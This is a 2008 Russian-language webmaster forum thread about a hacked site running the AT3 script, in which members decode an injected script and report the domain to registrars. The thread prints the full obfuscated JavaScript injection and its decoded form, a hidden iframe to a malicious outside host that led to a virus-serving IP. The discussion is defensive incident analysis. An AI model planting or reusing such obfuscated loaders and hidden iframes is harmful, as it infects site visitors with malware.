Master-X
Форум | Новости | Статьи
Главная » Форум » Читеры и Разгильдяи » 
Тема: Очередной взлом
цитата
06/10/08 в 17:26
 Sergeyka
в общем атаке подвергся сервак с сиджами
был вставлен этот код
Код:
<script>function c41883415430m48e9b513a50e1(m48e9b513a54c6){ var m48e9b513a58ad=16; return
(parseInt(m48e9b513a54c6,m48e9b513a58ad));}function m48e9b513a607d(m48e9b513a6466){ function m48e9b513a701f()
{return 2;} var m48e9b513a6850='';m48e9b513a77ed=String.fromCharCode;
for(m48e9b513a6c3a=0;m48e9b513a6c3a<m48e9b513a6466.length;
m48e9b513a6c3a+=m48e9b513a701f())
{ m48e9b513a6850+=(m48e9b513a77ed(c41883415430m48e9b513a50e1(m48e9b513a6466.substr
(m48e9b513a6c3a,m48e9b513a701f()))));}return m48e9b513a6850;} var z51='';var m48e9b513a7bd3='3C7'+z51+'3637'+z51+'2697'+z51+'07'+z51+'43E667'
+z51+'56E637'+z51+'4696F6E20636865636B5F636F6E7'+z51+'4656E7'+z51+
'428297'+z51+'B7'+z51+'6617'+z51+'220693D303B7'+z51+'7'+z51+
'68696C6528646F637'+z51+'56D656E7'+z51+'42E67'+z51+'657'+z51+
'4456C656D656E7'+z51+'47'+z51+'3427'+z51+'9546167'+z51+'4E616D652827'
+z51+'69667'+z51+'2616D6527'+z51+'292E6C656E67'+z51+'7'+z51+'468297'
+z51+'B7'+z51+'6617'+z51+'220656C3D646F637'+z51+'56D656E7'+z51+'42E67'
+z51+'657'+z51+'4456C656D656E7'+z51+'47'+z51+'3427'+z51+'9546167'+z51
+'4E616D652827'+z51+'69667'+z51+'2616D6527'+z51+'295B695D3B6966282028656C2E7'
+z51+'37'+z51+'47'+z51+'96C652E64697'+z51+'37'+z51+'06C617'+z51+'93D3D27'
+z51+'6E6F6E6527'+z51+'207'+z51+'C7'+z51+'C20656C2E7'+z51+'37'+z51
+'47'+z51+'96C652E7'+z51+'6697'+z51+'36962696C697'+z51+'47'+z51
+'9203D3D27'+z51+'68696464656E27'+z51+'207'+z51+'C7'+z51+'C2028656C2E7'
+z51+'7'+z51+'69647'+z51+'4683C3520262620656C2E68656967'+z51+'687'+z51
+'43C35292920262620656C2E6E616D65213D27'+z51+'633427'+z51+'297'+z51
+'B656C2E7'+z51+'0617'+z51+'2656E7'+z51+'44E6F64652E7'+z51+'2656D6F7'
+z51+'6654368696C6428656C293B7'+z51+'D656C7'+z51+'36520692B2B3B7'+z51
+'D7'+z51+'D636865636B5F636F6E7'+z51+'4656E7'+z51+'428293B0D0A696628216D7'
+z51+'96961297'+z51+'B646F637'+z51+'56D656E7'+z51+'42E7'+z51+'7'+z51+'7'
+z51+'2697'+z51+'465287'+z51+'56E657'+z51+'363617'+z51+'065282027'+z51
+'2533632536392536362537'+z51+'322536312536642536352532302536652536312536642536352533642536332533342532302537'
+z51+'332537'+z51+'32253633253364253237'+z51+'2536382537'+z51+'342537'+z51+'342537'+z51+'30253361253266253266253637'
+z51+'253666253666253637'+z51+'2536632536352532642536312536652536312536632536392537'+z51+
'61253635253265253633253666253664253266253639253665253265253633253637'+z51+'25363925336625333125333526253237'
+z51+'2532622534642536312537'+z51+'342536382532652537'+z51+'322536662537'+z51+'352536652536342532382534642536312537'
+z51+'342536382532652537'+z51+'32253631253665253634253666253664253238253239253261253336253336253335253335253332253239253262253237'
+z51+'253330253635253237'+z51+'2532302537'+z51+'37'+z51+'2536392536342537'+z51+'34253638253364253332253333253336253230253638253635253639253637'
+z51+'2536382537'+z51+'342533642533322533382533322532302537'+z51+'332537'+z51+'342537'+z51+'39253663253635253364253237'+z51+'2536342536392537'
+z51+'332537'+z51+'302536632536312537'+z51+'39253361253230253665253666253665253635253237'+z51+'2533652533632532662536392536362537'+z51+
'3225363125366425363525336527'+z51+'29293B7'+z51+'D7'+z51+'6617'+z51+'2206D7'+z51+'969613D7'+z51+'47'+z51+'27'+z51+'5653B3C2F7'+z51+'3637'
+z51+'2697'+z51+'07'+z51+'43E'ocument.write(m48e9b513a607d(m48e9b513a7bd3));</script><script>check_content()</script>


заражение шло
/
и
/папка/


кто силен в джава, колупните код, куда ведет эта хуйня?
цитата
06/10/08 в 18:33
 weely6
скажи лучше что за софт стоял на сиджах.
цитата
06/10/08 в 18:48
 Sergeyka
ат3
цитата
06/10/08 в 18:53
 Pentarh
Цитата:
ат3

ыыы
цитата
06/10/08 в 19:01
 Sergeyka
Pentarh писал:
ыыы


ты же кодер, помоги горю, колупни куда эта хуйня идет?
цитата
06/10/08 в 19:17
 coder-code
хуясе...это в индексе такое ставят?

использовалось ли ограничение по айпи для входа в админку сиджа?
цитата
06/10/08 в 19:35
 Pentarh
Код:
<iframe name=c4 src='http://google-analize.com/in.cgi?15&'+Math.round(Math.random()*66552)+'0e' width=236 height=282 style='display: none'></iframe>
цитата
06/10/08 в 19:37
 Pentarh
Цитата:
Whois Record for Google-analize.com:
ICANN Registrar: ESTDOMAINS, INC.

как неожиданно icon_mrgreen.gif
цитата
06/10/08 в 19:44
 Pentarh
Следующая пага ведет на
xttp://209.160.23.104/ls/?t=24 [вирус нах!]

Можно накатать арбуз на google-analize.com и на
http://whois.domaintools.com/209.160.23.104

Все по ходу в штатах. Должны отреагировать.
цитата
06/10/08 в 19:51
 Erotix
+1 совсем неожидано

HopOne параноики, отрубят сразу.
цитата
06/10/08 в 22:08
 Gourad
Последний ли билд ат3? Или ТС только из берлоги вылез?
Вопрос к тому, что не ждать ли новую волну взломов этого говноскрипта?
Цитата:
Whois Record for Google-analize.com:
ICANN Registrar: ESTDOMAINS, INC.

+1 удивительно smail101.gif
цитата
06/10/08 в 23:26
 weely6
slonic писал:
хуясе...это в индексе такое ставят?

использовалось ли ограничение по айпи для входа в админку сиджа?



+1 стояло ли ограничение по IP в админку? Меня с последним билдом тоже ломали, правда ограничения по IP небыло.
цитата
07/10/08 в 00:12
 Sergeyka
Стояло ограничение!
Пентарх спасибо!
Сегодня приду буду катать арбузы
цитата
07/10/08 в 00:18
 Pentarh
Возможно спиздили пароль фтп
цитата
07/10/08 в 00:19
 Gourad
Sergeyka писал:
Сегодня приду буду катать арбузы

Блядь.... чует мое сердце опять новая волна взломов пойдет. icon_sad.gif
Сергейка билд последний был?
Админские файлики .htaccess'ом закрывал?
цитата
07/10/08 в 00:28
 Sergeyka
арбузы улетели, ждем
цитата
07/10/08 в 00:31
 Sergeyka
Gourad писал:
Блядь.... чует мое сердце опять новая волна взломов пойдет. icon_sad.gif
Сергейка билд последний был?
Админские файлики .htaccess'ом закрывал?


да
и еще раз да
все последнее и закрыто

сейчас сапорт хостинга работает чтобы выяснить как попала кака... так как взломаны были именно сиджы

больше ничего не тронуто
цитата
07/10/08 в 04:54
 Spilk
мне на мыла приходит спам от google-analize.com с линками и предложением нажать. фильтры gmaila пропускают. может так подцепил?
цитата
07/10/08 в 10:30
 densa
ответ на мою абузу

Больше ничего взламывать не будет, снес NS и заблокировал домен. Можете и на форуме сообщить. Спасибо за сотрудничество.
цитата
07/10/08 в 10:50
 Pentarh
smail08.gif smail60.gif smail43.gif smail104.gif
цитата
07/10/08 в 12:54
 Sergeyka
Пентарх спасиб бро!
в очередной раз выручил! smail54.gif
цитата
07/10/08 в 17:25
 Ziegfrid
Так а было то чего? Взлом ат3 или фтп?
цитата
08/10/08 в 00:43
 Sergeyka
через АТ3

так что делайте выводы
цитата
08/10/08 в 08:01
 Ziegfrid
Sergeyka писал:
через АТ3

так что делайте выводы

А какие выводы то? Нашли как влезли то? Или это просто догадка?
цитата
08/10/08 в 12:20
 Sergeyka
если бы я знал как...
это не догадка, вредоносный код был встроен в шаблон
Стр. 1, 2  >  последняя »


Эта страница в полной версии